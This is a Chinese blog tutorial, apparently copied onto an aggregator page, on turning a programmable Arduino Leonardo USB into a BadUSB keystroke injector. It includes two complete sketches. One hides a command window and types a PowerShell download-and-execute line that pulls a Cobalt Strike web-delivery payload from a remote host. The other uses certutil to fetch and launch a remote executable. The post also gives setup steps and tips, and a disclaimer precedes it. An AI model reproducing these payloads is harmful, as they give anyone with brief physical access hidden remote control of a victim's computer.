当前位置: 首页 > news >正文

[近源攻击]badusb制作

免责声明:本文用于攻击者攻击方式,用于提高防范意识,切勿用于不法用途


前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文整理近源攻击制作攻击USB的相关思路

硬件支持

首先你得有跟up一样帅的可编程USB

安装编写工具

https://www.arduino.cc/en/software

 

然后安装好

插USB

先插上USB

然后在工具中选择相应型号的开发板

选择要开发的硬件板

这里的型号要看你买的USB是什么类型的。

我的是上面那个leonardo的。

然后选中这个USB

这里的名字可以在计算机管理页面端口位置查看

你插上多出来哪个就是哪个。

web投提式入侵

CS生成web投递

复制一下网址

然后把下面代码写到里面去

#include<Keyboard.h>void setup() {Keyboard.begin();delay(3000);//延时Keyboard.press(KEY_LEFT_GUI);delay(200); Keyboard.print("r");delay(200); Keyboard.release(KEY_LEFT_GUI);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口delay(200); //=========================Run==========================Keyboard.println("cmd");delay(500);Keyboard.println("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.9:6666/XD'))");delay(5000);//======================================================Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯 
}void loop()
{
}

powershell哪里自行修改为自己的,去除双引号

然后点击

即可上线

木马下载式入侵

代码如下

#include<Keyboard.h>void setup() {Keyboard.begin();delay(3000);//延时Keyboard.press(KEY_LEFT_GUI);delay(200); Keyboard.print("r");delay(200); Keyboard.release(KEY_LEFT_GUI);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1");   //使用最小化隐藏cmd窗口delay(200); //=========================Run==========================Keyboard.println("cmd");delay(500);Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/1.exe c:\\temp\\1.EXE");Keyboard.println("cd c:\\temp\\");Keyboard.println("1.exe");delay(500);Keyboard.println("exit");//======================================================Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯 
}void loop()
{
}

到时候给文件托管,让他下载到指定位置即可。

这种需要文件免杀。

上限高。

注意事项

1.开着vware虚拟机不太行,测试了一下他会提示你连接到虚拟机还是主机,你选择慢了他会提示端口占用

2.后面那个网址你代码中写的DE那么他访问的是de,反之相反。不知道是不是bug

3.每次编译完他都会自行执行一次的


http://www.mrgr.cn/news/54009.html

相关文章:

  • 【参与感】小米口碑营销内部手册-读后感
  • Java爬虫:API数据界的“宝藏猎人”
  • 炒股看分时图,这些知识你知道吗?
  • EasyExcel填充模板导出excel.xlsx
  • Planetoid(helpers.dataset_classes文件中的classic_datasets.py)
  • CRC-校验
  • 解锁文本数据可视化的无限可能:Wordcloud库全解析
  • 项目管理APP推荐_功能对比与用户评价
  • springboot038基于SpringBoot的网上租赁系统设计与实现(论文+源码)_kaic
  • 算法之二分查找法
  • 计算机网络基本架构实例1
  • Spring篇(事务篇 - 基础介绍)
  • 【Java】Java 的反射机制(二):类的加载(拓展)
  • 从多线程到 epoll:如何优雅地处理高并发请求?
  • python 爬虫 入门 三、登录以及代理。
  • 练习题 - Scrapy爬虫框架 Items 数据项
  • Mysql安装与卸载
  • C++虚函数的默认参数是静态绑定还是动态绑定
  • CTFHUB技能树之XSS——DOM反射
  • 从零开始学PHP之helloworld
  • 练习题 - Scrapy爬虫框架 Spider Middleware 爬虫页中间件
  • scrapy案例——链家租房数据的爬取
  • 外部存储器与内部存储器有哪些主要区别
  • [项目详解][boost搜索引擎#1] 概述 | 去标签 | 数据清洗 | scp
  • 【Trick】在vscode上配置copilot时,输出端出现Invalid copilot token: missing token: 403
  • 摩擦转矩摩擦特性曲线测量(详细算法逻辑框图+SCL源代码)